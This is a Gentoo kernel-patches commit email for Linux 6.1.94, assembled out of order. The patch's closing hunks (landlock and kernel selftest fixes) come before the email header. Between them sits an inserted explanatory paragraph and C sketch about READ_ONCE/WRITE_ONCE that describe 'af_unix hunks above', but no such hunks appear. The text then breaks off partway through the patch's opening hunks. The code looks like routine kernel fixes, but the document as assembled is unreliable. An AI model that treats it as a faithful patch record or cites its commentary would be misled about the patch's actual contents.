+@@ -870,9 +871,17 @@ static int current_check_refer_path(struct dentry *const old_dentry,
+ 	mnt_dir.mnt = new_dir->mnt;
+ 	mnt_dir.dentry = new_dir->mnt->mnt_root;
+ 
++	/*
++	 * old_dentry may be the root of the common mount point and
++	 * !IS_ROOT(old_dentry) at the same time (e.g. with open_tree() and
++	 * OPEN_TREE_CLONE).  We do not need to call dget(old_parent) because
++	 * we keep a reference to old_dentry.
++	 */
++	old_parent = (old_dentry == mnt_dir.dentry) ? old_dentry :
++						      old_dentry->d_parent;
++
+ 	/* new_dir->dentry is equal to new_dentry->d_parent */
+-	allow_parent1 = collect_domain_accesses(dom, mnt_dir.dentry,
+-						old_dentry->d_parent,
++	allow_parent1 = collect_domain_accesses(dom, mnt_dir.dentry, old_parent,
+ 						&layer_masks_parent1);
+ 	allow_parent2 = collect_domain_accesses(
+ 		dom, mnt_dir.dentry, new_dir->dentry, &layer_masks_parent2);
+diff --git a/tools/testing/cxl/test/mem.c b/tools/testing/cxl/test/mem.c
+index aa2df3a150518..6e9a89f54d94f 100644
+--- a/tools/testing/cxl/test/mem.c
++++ b/tools/testing/cxl/test/mem.c
+@@ -3,6 +3,7 @@
+ 
+ #include <linux/platform_device.h>
+ #include <linux/mod_devicetable.h>
++#include <linux/vmalloc.h>
+ #include <linux/module.h>
+ #include <linux/delay.h>
+ #include <linux/sizes.h>
+diff --git a/tools/testing/selftests/ftrace/test.d/dynevent/test_duplicates.tc b/tools/testing/selftests/ftrace/test.d/dynevent/test_duplicates.tc
+index d3a79da215c8b..5f72abe6fa79b 100644
+--- a/tools/testing/selftests/ftrace/test.d/dynevent/test_duplicates.tc
++++ b/tools/testing/selftests/ftrace/test.d/dynevent/test_duplicates.tc
+@@ -1,7 +1,7 @@
+ #!/bin/sh
+ # SPDX-License-Identifier: GPL-2.0
+ # description: Generic dynamic event - check if duplicate events are caught
+-# requires: dynamic_events "e[:[<group>/][<event>]] <attached-group>.<attached-event> [<args>]":README
++# requires: dynamic_events "e[:[<group>/][<event>]] <attached-group>.<attached-event> [<args>]":README events/syscalls/sys_enter_openat
+ 
+ echo 0 > events/enable
+ 
+diff --git a/tools/testing/selftests/ftrace/test.d/kprobe/kprobe_eventname.tc b/tools/testing/selftests/ftrace/test.d/kprobe/kprobe_eventname.tc
+index 1f6981ef7afa0..ba19b81cef39a 100644
+--- a/tools/testing/selftests/ftrace/test.d/kprobe/kprobe_eventname.tc
++++ b/tools/testing/selftests/ftrace/test.d/kprobe/kprobe_eventname.tc
+@@ -30,7 +30,8 @@ find_dot_func() {
+ 	fi
+ 
+ 	grep " [tT] .*\.isra\..*" /proc/kallsyms | cut -f 3 -d " " | while read f; do
+-		if grep -s $f available_filter_functions; then
++		cnt=`grep -s $f available_filter_functions | wc -l`;
++		if [ $cnt -eq 1 ]; then
+ 			echo $f
+ 			break
+ 		fi
+diff --git a/tools/testing/selftests/net/mptcp/mptcp_join.sh b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+index 635a1624b47dc..51f68bb6bdb8a 100755
+--- a/tools/testing/selftests/net/mptcp/mptcp_join.sh
++++ b/tools/testing/selftests/net/mptcp/mptcp_join.sh
+@@ -2343,9 +2343,10 @@ remove_tests()
+ 	if reset "remove invalid addresses"; then
+ 		pm_nl_set_limits $ns1 3 3
+ 		pm_nl_add_endpoint $ns1 10.0.12.1 flags signal
++		# broadcast IP: no packet for this address will be received on ns1
++		pm_nl_add_endpoint $ns1 224.0.0.1 flags signal
+ 		pm_nl_add_endpoint $ns1 10.0.3.1 flags signal
+-		pm_nl_add_endpoint $ns1 10.0.14.1 flags signal
+-		pm_nl_set_limits $ns2 3 3
++		pm_nl_set_limits $ns2 2 2
+ 		run_tests $ns1 $ns2 10.0.1.1 0 -3 0 speed_10
+ 		chk_join_nr 1 1 1
+ 		chk_add_nr 3 3
+diff --git a/tools/testing/selftests/vm/compaction_test.c b/tools/testing/selftests/vm/compaction_test.c
+index 9b420140ba2ba..309b3750e57e1 100644
+--- a/tools/testing/selftests/vm/compaction_test.c
++++ b/tools/testing/selftests/vm/compaction_test.c
+@@ -33,7 +33,7 @@ int read_memory_info(unsigned long *memfree, unsigned long *hugepagesize)
+ 	FILE *cmdfile = popen(cmd, "r");
+ 
+ 	if (!(fgets(buffer, sizeof(buffer), cmdfile))) {
+-		perror("Failed to read meminfo\n");
++		ksft_print_msg("Failed to read meminfo: %s\n", strerror(errno));
+ 		return -1;
+ 	}
+ 
+@@ -44,7 +44,7 @@ int read_memory_info(unsigned long *memfree, unsigned long *hugepagesize)
+ 	cmdfile = popen(cmd, "r");
+ 
+ 	if (!(fgets(buffer, sizeof(buffer), cmdfile))) {
+-		perror("Failed to read meminfo\n");
++		ksft_print_msg("Failed to read meminfo: %s\n", strerror(errno));
+ 		return -1;
+ 	}
+ 
+@@ -62,14 +62,14 @@ int prereq(void)
+ 	fd = open("/proc/sys/vm/compact_unevictable_allowed",
+ 		  O_RDONLY | O_NONBLOCK);
+ 	if (fd < 0) {
+-		perror("Failed to open\n"
+-		       "/proc/sys/vm/compact_unevictable_allowed\n");
++		ksft_print_msg("Failed to open /proc/sys/vm/compact_unevictable_allowed: %s\n",
++			       strerror(errno));
+ 		return -1;
+ 	}
+ 
+ 	if (read(fd, &allowed, sizeof(char)) != sizeof(char)) {
+-		perror("Failed to read from\n"
+-		       "/proc/sys/vm/compact_unevictable_allowed\n");
++		ksft_print_msg("Failed to read from /proc/sys/vm/compact_unevictable_allowed: %s\n",
++			       strerror(errno));
+ 		close(fd);
+ 		return -1;
+ 	}
+@@ -78,15 +78,17 @@ int prereq(void)
+ 	if (allowed == '1')
+ 		return 0;
+ 
++	ksft_print_msg("Compaction isn't allowed\n");
+ 	return -1;
+ }
+ 
+-int check_compaction(unsigned long mem_free, unsigned int hugepage_size)
++int check_compaction(unsigned long mem_free, unsigned long hugepage_size)
+ {
+-	int fd;
++	unsigned long nr_hugepages_ul;
++	int fd, ret = -1;
+ 	int compaction_index = 0;
+-	char initial_nr_hugepages[10] = {0};
+-	char nr_hugepages[10] = {0};
++	char initial_nr_hugepages[20] = {0};
++	char nr_hugepages[20] = {0};
+ 
+ 	/* We want to test with 80% of available memory. Else, OOM killer comes
+ 	   in to play */
+@@ -94,18 +96,24 @@ int check_compaction(unsigned long mem_free, unsigned int hugepage_size)
+ 
+ 	fd = open("/proc/sys/vm/nr_hugepages", O_RDWR | O_NONBLOCK);
+ 	if (fd < 0) {
+-		perror("Failed to open /proc/sys/vm/nr_hugepages");
+-		return -1;
++		ksft_print_msg("Failed to open /proc/sys/vm/nr_hugepages: %s\n",
++			       strerror(errno));
++		ret = -1;
++		goto out;
+ 	}
+ 
+ 	if (read(fd, initial_nr_hugepages, sizeof(initial_nr_hugepages)) <= 0) {
+-		perror("Failed to read from /proc/sys/vm/nr_hugepages");
++		ksft_print_msg("Failed to read from /proc/sys/vm/nr_hugepages: %s\n",
++			       strerror(errno));
+ 		goto close_fd;
+ 	}
+ 
++	lseek(fd, 0, SEEK_SET);
++
+ 	/* Start with the initial condition of 0 huge pages*/
+ 	if (write(fd, "0", sizeof(char)) != sizeof(char)) {
+-		perror("Failed to write 0 to /proc/sys/vm/nr_hugepages\n");
++		ksft_print_msg("Failed to write 0 to /proc/sys/vm/nr_hugepages: %s\n",
++			       strerror(errno));
+ 		goto close_fd;
+ 	}
+ 
+@@ -114,82 +122,82 @@ int check_compaction(unsigned long mem_free, unsigned int hugepage_size)
+ 	/* Request a large number of huge pages. The Kernel will allocate
+ 	   as much as it can */
+ 	if (write(fd, "100000", (6*sizeof(char))) != (6*sizeof(char))) {
+-		perror("Failed to write 100000 to /proc/sys/vm/nr_hugepages\n");
++		ksft_print_msg("Failed to write 100000 to /proc/sys/vm/nr_hugepages: %s\n",
++			       strerror(errno));
+ 		goto close_fd;
+ 	}
+ 
+ 	lseek(fd, 0, SEEK_SET);
+ 
+ 	if (read(fd, nr_hugepages, sizeof(nr_hugepages)) <= 0) {
+-		perror("Failed to re-read from /proc/sys/vm/nr_hugepages\n");
++		ksft_print_msg("Failed to re-read from /proc/sys/vm/nr_hugepages: %s\n",
++			       strerror(errno));
+ 		goto close_fd;
+ 	}
+ 
+ 	/* We should have been able to request at least 1/3 rd of the memory in
+ 	   huge pages */
+-	compaction_index = mem_free/(atoi(nr_hugepages) * hugepage_size);
+-
+-	if (compaction_index > 3) {
+-		printf("No of huge pages allocated = %d\n",
+-		       (atoi(nr_hugepages)));
+-		fprintf(stderr, "ERROR: Less that 1/%d of memory is available\n"
+-			"as huge pages\n", compaction_index);
++	nr_hugepages_ul = strtoul(nr_hugepages, NULL, 10);
++	if (!nr_hugepages_ul) {
++		ksft_print_msg("ERROR: No memory is available as huge pages\n");
+ 		goto close_fd;
+ 	}
+-
+-	printf("No of huge pages allocated = %d\n",
+-	       (atoi(nr_hugepages)));
++	compaction_index = mem_free/(nr_hugepages_ul * hugepage_size);
+ 
+ 	lseek(fd, 0, SEEK_SET);
+ 
+ 	if (write(fd, initial_nr_hugepages, strlen(initial_nr_hugepages))
+ 	    != strlen(initial_nr_hugepages)) {
+-		perror("Failed to write value to /proc/sys/vm/nr_hugepages\n");
++		ksft_print_msg("Failed to write value to /proc/sys/vm/nr_hugepages: %s\n",
++			       strerror(errno));
+ 		goto close_fd;
+ 	}
+ 
+-	close(fd);
+-	return 0;
++	ksft_print_msg("Number of huge pages allocated = %lu\n",
++		       nr_hugepages_ul);
++
++	if (compaction_index > 3) {
++		ksft_print_msg("ERROR: Less than 1/%d of memory is available\n"
++			       "as huge pages\n", compaction_index);
++		goto close_fd;
++	}
++
++	ret = 0;
+ 
+  close_fd:
+ 	close(fd);
+-	printf("Not OK. Compaction test failed.");
+-	return -1;
++ out:
++	ksft_test_result(ret == 0, "check_compaction\n");
++	return ret;
+ }
+ 
+ 
+ int main(int argc, char **argv)
+ {
+ 	struct rlimit lim;
+-	struct map_list *list, *entry;
++	struct map_list *list = NULL, *entry;
+ 	size_t page_size, i;
+ 	void *map = NULL;
+ 	unsigned long mem_free = 0;
+ 	unsigned long hugepage_size = 0;
+ 	long mem_fragmentable_MB = 0;
+ 
+-	if (prereq() != 0) {
+-		printf("Either the sysctl compact_unevictable_allowed is not\n"
+-		       "set to 1 or couldn't read the proc file.\n"
+-		       "Skipping the test\n");
+-		return KSFT_SKIP;
+-	}
++	ksft_print_header();
++
++	if (prereq() != 0)
++		return ksft_exit_pass();
++
++	ksft_set_plan(1);
+ 
+ 	lim.rlim_cur = RLIM_INFINITY;
+ 	lim.rlim_max = RLIM_INFINITY;
+-	if (setrlimit(RLIMIT_MEMLOCK, &lim)) {
+-		perror("Failed to set rlimit:\n");
+-		return -1;
+-	}
++	if (setrlimit(RLIMIT_MEMLOCK, &lim))
++		ksft_exit_fail_msg("Failed to set rlimit: %s\n", strerror(errno));
+ 
+ 	page_size = getpagesize();
+ 
+-	list = NULL;
+-
+-	if (read_memory_info(&mem_free, &hugepage_size) != 0) {
+-		printf("ERROR: Cannot read meminfo\n");
+-		return -1;
+-	}
++	if (read_memory_info(&mem_free, &hugepage_size) != 0)
++		ksft_exit_fail_msg("Failed to get meminfo\n");
+ 
+ 	mem_fragmentable_MB = mem_free * 0.8 / 1024;
+ 
+@@ -225,7 +233,7 @@ int main(int argc, char **argv)
+ 	}
+ 
+ 	if (check_compaction(mem_free, hugepage_size) == 0)
+-		return 0;
++		return ksft_exit_pass();
+ 
+-	return -1;
++	return ksft_exit_fail();
+ }


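The af_unix hunks above repeatedly convert plain loads and stores of fields that are read locklessly, such as sk->sk_state and sk->sk_err, into READ_ONCE()/WRITE_ONCE() accesses, and rework unix_writable()/unix_poll() to test a single snapshot of the state. Below is a minimal userspace sketch of that annotation pattern. The macro definitions are simplified versions of the kernel's; struct conn, its field, and the helper names are hypothetical stand-ins for illustration, not anything taken from the patch.

/*
 * Sketch of the READ_ONCE()/WRITE_ONCE() data-race annotation pattern.
 * The macros mirror (in simplified form) the kernel's volatile-cast
 * definitions; everything else here is a hypothetical example.
 */
#include <stdio.h>

#define READ_ONCE(x)     (*(const volatile __typeof__(x) *)&(x))
#define WRITE_ONCE(x, v) (*(volatile __typeof__(x) *)&(x) = (v))

enum { CONN_CLOSE = 0, CONN_ESTABLISHED = 1 };

struct conn {
	unsigned char state;	/* read locklessly by poll-style paths */
};

/* Writer side: publish the new state with one untorn store. */
static void conn_establish(struct conn *c)
{
	WRITE_ONCE(c->state, CONN_ESTABLISHED);
}

/*
 * Reader side: snapshot the state once and test the snapshot, the way
 * the patched unix_poll() snapshots sk->sk_state before checking it.
 */
static int conn_writable(const struct conn *c)
{
	unsigned char state = READ_ONCE(c->state);

	return state != CONN_CLOSE;
}

int main(void)
{
	struct conn c = { .state = CONN_CLOSE };

	conn_establish(&c);
	printf("writable: %d\n", conn_writable(&c));
	return 0;
}

The snapshot matters because every test in the poll path then sees one consistent state value even if a writer changes it concurrently, and the volatile casts keep the compiler from tearing, fusing, or silently re-reading the access.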
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2024-06-16 14:33 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2024-06-16 14:33 UTC (permalink / raw
  To: gentoo-commits

commit:     4ee39adbcd6679173df7cf39402a7343df4f580b
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sun Jun 16 14:33:36 2024 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sun Jun 16 14:33:36 2024 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=4ee39adb

Linux patch 6.1.94

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1093_linux-6.1.94.patch | 3788 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 3792 insertions(+)

diff --git a/0000_README b/0000_README
index 87ce6763..f71731e0 100644
--- a/0000_README
+++ b/0000_README
@@ -415,6 +415,10 @@ Patch:  1092_linux-6.1.93.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.93
 
+Patch:  1093_linux-6.1.94.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.94
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1093_linux-6.1.94.patch b/1093_linux-6.1.94.patch
new file mode 100644
index 00000000..ef37672b
--- /dev/null
+++ b/1093_linux-6.1.94.patch
@@ -0,0 +1,3788 @@
+diff --git a/Documentation/mm/arch_pgtable_helpers.rst b/Documentation/mm/arch_pgtable_helpers.rst
+index cbaee9e592410..511b4314095b5 100644
+--- a/Documentation/mm/arch_pgtable_helpers.rst
++++ b/Documentation/mm/arch_pgtable_helpers.rst
+@@ -136,7 +136,8 @@ PMD Page Table Helpers
+ +---------------------------+--------------------------------------------------+
+ | pmd_swp_clear_soft_dirty  | Clears a soft dirty swapped PMD                  |
+ +---------------------------+--------------------------------------------------+
+-| pmd_mkinvalid             | Invalidates a mapped PMD [1]                     |
++| pmd_mkinvalid             | Invalidates a present PMD; do not call for       |
++|                           | non-present PMD [1]                              |
+ +---------------------------+--------------------------------------------------+
+ | pmd_set_huge              | Creates a PMD huge mapping                       |
+ +---------------------------+--------------------------------------------------+
+@@ -192,7 +193,8 @@ PUD Page Table Helpers
+ +---------------------------+--------------------------------------------------+
+ | pud_mkdevmap              | Creates a ZONE_DEVICE mapped PUD                 |
+ +---------------------------+--------------------------------------------------+
+-| pud_mkinvalid             | Invalidates a mapped PUD [1]                     |
++| pud_mkinvalid             | Invalidates a present PUD; do not call for       |
++|                           | non-present PUD [1]                              |
+ +---------------------------+--------------------------------------------------+
+ | pud_set_huge              | Creates a PUD huge mapping                       |
+ +---------------------------+--------------------------------------------------+
+diff --git a/Makefile b/Makefile
+index c5147f1c46f87..6c21684b032ee 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 93
++SUBLEVEL = 94
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm64/boot/dts/hisilicon/hi3798cv200.dtsi b/arch/arm64/boot/dts/hisilicon/hi3798cv200.dtsi
+index a83b9d4f172e3..add54f4e7be97 100644
+--- a/arch/arm64/boot/dts/hisilicon/hi3798cv200.dtsi
++++ b/arch/arm64/boot/dts/hisilicon/hi3798cv200.dtsi
+@@ -58,7 +58,7 @@ cpu@3 {
+ 	gic: interrupt-controller@f1001000 {
+ 		compatible = "arm,gic-400";
+ 		reg = <0x0 0xf1001000 0x0 0x1000>,  /* GICD */
+-		      <0x0 0xf1002000 0x0 0x100>;   /* GICC */
++		      <0x0 0xf1002000 0x0 0x2000>;  /* GICC */
+ 		#address-cells = <0>;
+ 		#interrupt-cells = <3>;
+ 		interrupt-controller;
+diff --git a/arch/arm64/boot/dts/nvidia/tegra132-norrin.dts b/arch/arm64/boot/dts/nvidia/tegra132-norrin.dts
+index d461da0b80492..22cb4d5f0416e 100644
+--- a/arch/arm64/boot/dts/nvidia/tegra132-norrin.dts
++++ b/arch/arm64/boot/dts/nvidia/tegra132-norrin.dts
+@@ -9,8 +9,8 @@ / {
+ 	compatible = "nvidia,norrin", "nvidia,tegra132", "nvidia,tegra124";
+ 
+ 	aliases {
+-		rtc0 = "/i2c@7000d000/as3722@40";
+-		rtc1 = "/rtc@7000e000";
++		rtc0 = &as3722;
++		rtc1 = &tegra_rtc;
+ 		serial0 = &uarta;
+ 	};
+ 
+diff --git a/arch/arm64/boot/dts/nvidia/tegra132.dtsi b/arch/arm64/boot/dts/nvidia/tegra132.dtsi
+index 3673f79adf1a9..ca8960f0c4ab9 100644
+--- a/arch/arm64/boot/dts/nvidia/tegra132.dtsi
++++ b/arch/arm64/boot/dts/nvidia/tegra132.dtsi
+@@ -579,7 +579,7 @@ spi@7000de00 {
+ 		status = "disabled";
+ 	};
+ 
+-	rtc@7000e000 {
++	tegra_rtc: rtc@7000e000 {
+ 		compatible = "nvidia,tegra124-rtc", "nvidia,tegra20-rtc";
+ 		reg = <0x0 0x7000e000 0x0 0x100>;
+ 		interrupts = <GIC_SPI 2 IRQ_TYPE_LEVEL_HIGH>;
+diff --git a/arch/arm64/boot/dts/qcom/qcs404-evb.dtsi b/arch/arm64/boot/dts/qcom/qcs404-evb.dtsi
+index 1678ef0f8684f..737a67e0a6ad7 100644
+--- a/arch/arm64/boot/dts/qcom/qcs404-evb.dtsi
++++ b/arch/arm64/boot/dts/qcom/qcs404-evb.dtsi
+@@ -60,7 +60,7 @@ bluetooth {
+ 		vddrf-supply = <&vreg_l1_1p3>;
+ 		vddch0-supply = <&vdd_ch0_3p3>;
+ 
+-		local-bd-address = [ 02 00 00 00 5a ad ];
++		local-bd-address = [ 00 00 00 00 00 00 ];
+ 
+ 		max-speed = <3200000>;
+ 	};
+diff --git a/arch/arm64/kvm/guest.c b/arch/arm64/kvm/guest.c
+index f44ae09a51956..5dbaf3fe90221 100644
+--- a/arch/arm64/kvm/guest.c
++++ b/arch/arm64/kvm/guest.c
+@@ -250,6 +250,7 @@ static int set_core_reg(struct kvm_vcpu *vcpu, const struct kvm_one_reg *reg)
+ 		case PSR_AA32_MODE_SVC:
+ 		case PSR_AA32_MODE_ABT:
+ 		case PSR_AA32_MODE_UND:
++		case PSR_AA32_MODE_SYS:
+ 			if (!vcpu_el1_is_32bit(vcpu))
+ 				return -EINVAL;
+ 			break;
+@@ -270,7 +271,7 @@ static int set_core_reg(struct kvm_vcpu *vcpu, const struct kvm_one_reg *reg)
+ 	if (*vcpu_cpsr(vcpu) & PSR_MODE32_BIT) {
+ 		int i, nr_reg;
+ 
+-		switch (*vcpu_cpsr(vcpu)) {
++		switch (*vcpu_cpsr(vcpu) & PSR_AA32_MODE_MASK) {
+ 		/*
+ 		 * Either we are dealing with user mode, and only the
+ 		 * first 15 registers (+ PC) must be narrowed to 32bit.
+diff --git a/arch/arm64/kvm/hyp/aarch32.c b/arch/arm64/kvm/hyp/aarch32.c
+index f98cbe2626a1c..19efb41aab805 100644
+--- a/arch/arm64/kvm/hyp/aarch32.c
++++ b/arch/arm64/kvm/hyp/aarch32.c
+@@ -50,9 +50,23 @@ bool kvm_condition_valid32(const struct kvm_vcpu *vcpu)
+ 	u32 cpsr_cond;
+ 	int cond;
+ 
+-	/* Top two bits non-zero?  Unconditional. */
+-	if (kvm_vcpu_get_esr(vcpu) >> 30)
++	/*
++	 * These are the exception classes that could fire with a
++	 * conditional instruction.
++	 */
++	switch (kvm_vcpu_trap_get_class(vcpu)) {
++	case ESR_ELx_EC_CP15_32:
++	case ESR_ELx_EC_CP15_64:
++	case ESR_ELx_EC_CP14_MR:
++	case ESR_ELx_EC_CP14_LS:
++	case ESR_ELx_EC_FP_ASIMD:
++	case ESR_ELx_EC_CP10_ID:
++	case ESR_ELx_EC_CP14_64:
++	case ESR_ELx_EC_SVC32:
++		break;
++	default:
+ 		return true;
++	}
+ 
+ 	/* Is condition field valid? */
+ 	cond = kvm_vcpu_get_condition(vcpu);
+diff --git a/arch/parisc/include/asm/page.h b/arch/parisc/include/asm/page.h
+index 6faaaa3ebe9b8..e93baddf3a2e7 100644
+--- a/arch/parisc/include/asm/page.h
++++ b/arch/parisc/include/asm/page.h
+@@ -16,6 +16,7 @@
+ #define PAGE_SIZE	(_AC(1,UL) << PAGE_SHIFT)
+ #define PAGE_MASK	(~(PAGE_SIZE-1))
+ 
++#define HAVE_ARCH_HUGETLB_UNMAPPED_AREA
+ 
+ #ifndef __ASSEMBLY__
+ 
+diff --git a/arch/parisc/include/asm/signal.h b/arch/parisc/include/asm/signal.h
+index 715c96ba2ec81..e84883c6b4c7a 100644
+--- a/arch/parisc/include/asm/signal.h
++++ b/arch/parisc/include/asm/signal.h
+@@ -4,23 +4,11 @@
+ 
+ #include <uapi/asm/signal.h>
+ 
+-#define _NSIG		64
+-/* bits-per-word, where word apparently means 'long' not 'int' */
+-#define _NSIG_BPW	BITS_PER_LONG
+-#define _NSIG_WORDS	(_NSIG / _NSIG_BPW)
+-
+ # ifndef __ASSEMBLY__
+ 
+ /* Most things should be clean enough to redefine this at will, if care
+    is taken to make libc match.  */
+ 
+-typedef unsigned long old_sigset_t;		/* at least 32 bits */
+-
+-typedef struct {
+-	/* next_signal() assumes this is a long - no choice */
+-	unsigned long sig[_NSIG_WORDS];
+-} sigset_t;
+-
+ #include <asm/sigcontext.h>
+ 
+ #endif /* !__ASSEMBLY */
+diff --git a/arch/parisc/include/uapi/asm/signal.h b/arch/parisc/include/uapi/asm/signal.h
+index 8e4895c5ea5d3..40d7a574c5dd1 100644
+--- a/arch/parisc/include/uapi/asm/signal.h
++++ b/arch/parisc/include/uapi/asm/signal.h
+@@ -57,10 +57,20 @@
+ 
+ #include <asm-generic/signal-defs.h>
+ 
++#define _NSIG		64
++#define _NSIG_BPW	(sizeof(unsigned long) * 8)
++#define _NSIG_WORDS	(_NSIG / _NSIG_BPW)
++
+ # ifndef __ASSEMBLY__
+ 
+ #  include <linux/types.h>
+ 
++typedef unsigned long old_sigset_t;	/* at least 32 bits */
++
++typedef struct {
++	unsigned long sig[_NSIG_WORDS];
++} sigset_t;
++
+ /* Avoid too many header ordering problems.  */
+ struct siginfo;
+ 
+diff --git a/arch/powerpc/mm/book3s64/pgtable.c b/arch/powerpc/mm/book3s64/pgtable.c
+index 87aa76c737995..a3bce0895b7d2 100644
+--- a/arch/powerpc/mm/book3s64/pgtable.c
++++ b/arch/powerpc/mm/book3s64/pgtable.c
+@@ -124,6 +124,7 @@ pmd_t pmdp_invalidate(struct vm_area_struct *vma, unsigned long address,
+ {
+ 	unsigned long old_pmd;
+ 
++	VM_WARN_ON_ONCE(!pmd_present(*pmdp));
+ 	old_pmd = pmd_hugepage_update(vma->vm_mm, address, pmdp, _PAGE_PRESENT, _PAGE_INVALID);
+ 	flush_pmd_tlb_range(vma, address, address + HPAGE_PMD_SIZE);
+ 	return __pmd(old_pmd);
+diff --git a/arch/powerpc/net/bpf_jit_comp32.c b/arch/powerpc/net/bpf_jit_comp32.c
+index 8643b2c8b76ef..7b3bf859433a5 100644
+--- a/arch/powerpc/net/bpf_jit_comp32.c
++++ b/arch/powerpc/net/bpf_jit_comp32.c
+@@ -814,6 +814,15 @@ int bpf_jit_build_body(struct bpf_prog *fp, u32 *image, struct codegen_context *
+ 
+ 			/* Get offset into TMP_REG */
+ 			EMIT(PPC_RAW_LI(tmp_reg, off));
++			/*
++			 * Enforce full ordering for operations with BPF_FETCH by emitting a 'sync'
++			 * before and after the operation.
++			 *
++			 * This is a requirement in the Linux Kernel Memory Model.
++			 * See __cmpxchg_u32() in asm/cmpxchg.h as an example.
++			 */
++			if ((imm & BPF_FETCH) && IS_ENABLED(CONFIG_SMP))
++				EMIT(PPC_RAW_SYNC());
+ 			tmp_idx = ctx->idx * 4;
+ 			/* load value from memory into r0 */
+ 			EMIT(PPC_RAW_LWARX(_R0, tmp_reg, dst_reg, 0));
+@@ -867,6 +876,9 @@ int bpf_jit_build_body(struct bpf_prog *fp, u32 *image, struct codegen_context *
+ 
+ 			/* For the BPF_FETCH variant, get old data into src_reg */
+ 			if (imm & BPF_FETCH) {
++				/* Emit 'sync' to enforce full ordering */
++				if (IS_ENABLED(CONFIG_SMP))
++					EMIT(PPC_RAW_SYNC());
+ 				EMIT(PPC_RAW_MR(ret_reg, ax_reg));
+ 				if (!fp->aux->verifier_zext)
+ 					EMIT(PPC_RAW_LI(ret_reg - 1, 0)); /* higher 32-bit */
+diff --git a/arch/powerpc/net/bpf_jit_comp64.c b/arch/powerpc/net/bpf_jit_comp64.c
+index 29ee306d6302e..dcb625404938f 100644
+--- a/arch/powerpc/net/bpf_jit_comp64.c
++++ b/arch/powerpc/net/bpf_jit_comp64.c
+@@ -784,6 +784,15 @@ int bpf_jit_build_body(struct bpf_prog *fp, u32 *image, struct codegen_context *
+ 
+ 			/* Get offset into TMP_REG_1 */
+ 			EMIT(PPC_RAW_LI(tmp1_reg, off));
++			/*
++			 * Enforce full ordering for operations with BPF_FETCH by emitting a 'sync'
++			 * before and after the operation.
++			 *
++			 * This is a requirement in the Linux Kernel Memory Model.
++			 * See __cmpxchg_u64() in asm/cmpxchg.h as an example.
++			 */
++			if ((imm & BPF_FETCH) && IS_ENABLED(CONFIG_SMP))
++				EMIT(PPC_RAW_SYNC());
+ 			tmp_idx = ctx->idx * 4;
+ 			/* load value from memory into TMP_REG_2 */
+ 			if (size == BPF_DW)
+@@ -846,6 +855,9 @@ int bpf_jit_build_body(struct bpf_prog *fp, u32 *image, struct codegen_context *
+ 			PPC_BCC_SHORT(COND_NE, tmp_idx);
+ 
+ 			if (imm & BPF_FETCH) {
++				/* Emit 'sync' to enforce full ordering */
++				if (IS_ENABLED(CONFIG_SMP))
++					EMIT(PPC_RAW_SYNC());
+ 				EMIT(PPC_RAW_MR(ret_reg, _R0));
+ 				/*
+ 				 * Skip unnecessary zero-extension for 32-bit cmpxchg.
+diff --git a/arch/riscv/kernel/signal.c b/arch/riscv/kernel/signal.c
+index dee66c9290cce..36bb15af6fa82 100644
+--- a/arch/riscv/kernel/signal.c
++++ b/arch/riscv/kernel/signal.c
+@@ -246,30 +246,6 @@ static void handle_signal(struct ksignal *ksig, struct pt_regs *regs)
+ 	sigset_t *oldset = sigmask_to_save();
+ 	int ret;
+ 
+-	/* Are we from a system call? */
+-	if (regs->cause == EXC_SYSCALL) {
+-		/* Avoid additional syscall restarting via ret_from_exception */
+-		regs->cause = -1UL;
+-		/* If so, check system call restarting.. */
+-		switch (regs->a0) {
+-		case -ERESTART_RESTARTBLOCK:
+-		case -ERESTARTNOHAND:
+-			regs->a0 = -EINTR;
+-			break;
+-
+-		case -ERESTARTSYS:
+-			if (!(ksig->ka.sa.sa_flags & SA_RESTART)) {
+-				regs->a0 = -EINTR;
+-				break;
+-			}
+-			fallthrough;
+-		case -ERESTARTNOINTR:
+-                        regs->a0 = regs->orig_a0;
+-			regs->epc -= 0x4;
+-			break;
+-		}
+-	}
+-
+ 	rseq_signal_deliver(ksig, regs);
+ 
+ 	/* Set up the stack frame */
+@@ -283,35 +259,66 @@ static void handle_signal(struct ksignal *ksig, struct pt_regs *regs)
+ 
+ static void do_signal(struct pt_regs *regs)
+ {
++	unsigned long continue_addr = 0, restart_addr = 0;
++	int retval = 0;
+ 	struct ksignal ksig;
++	bool syscall = (regs->cause == EXC_SYSCALL);
+ 
+-	if (get_signal(&ksig)) {
+-		/* Actually deliver the signal */
+-		handle_signal(&ksig, regs);
+-		return;
+-	}
++	/* If we were from a system call, check for system call restarting */
++	if (syscall) {
++		continue_addr = regs->epc;
++		restart_addr = continue_addr - 4;
++		retval = regs->a0;
+ 
+-	/* Did we come from a system call? */
+-	if (regs->cause == EXC_SYSCALL) {
+ 		/* Avoid additional syscall restarting via ret_from_exception */
+ 		regs->cause = -1UL;
+ 
+-		/* Restart the system call - no handlers present */
+-		switch (regs->a0) {
++		/*
++		 * Prepare for system call restart. We do this here so that a
++		 * debugger will see the already changed PC.
++		 */
++		switch (retval) {
+ 		case -ERESTARTNOHAND:
+ 		case -ERESTARTSYS:
+ 		case -ERESTARTNOINTR:
+-                        regs->a0 = regs->orig_a0;
+-			regs->epc -= 0x4;
+-			break;
+ 		case -ERESTART_RESTARTBLOCK:
+-                        regs->a0 = regs->orig_a0;
+-			regs->a7 = __NR_restart_syscall;
+-			regs->epc -= 0x4;
++			regs->a0 = regs->orig_a0;
++			regs->epc = restart_addr;
+ 			break;
+ 		}
+ 	}
+ 
++	/*
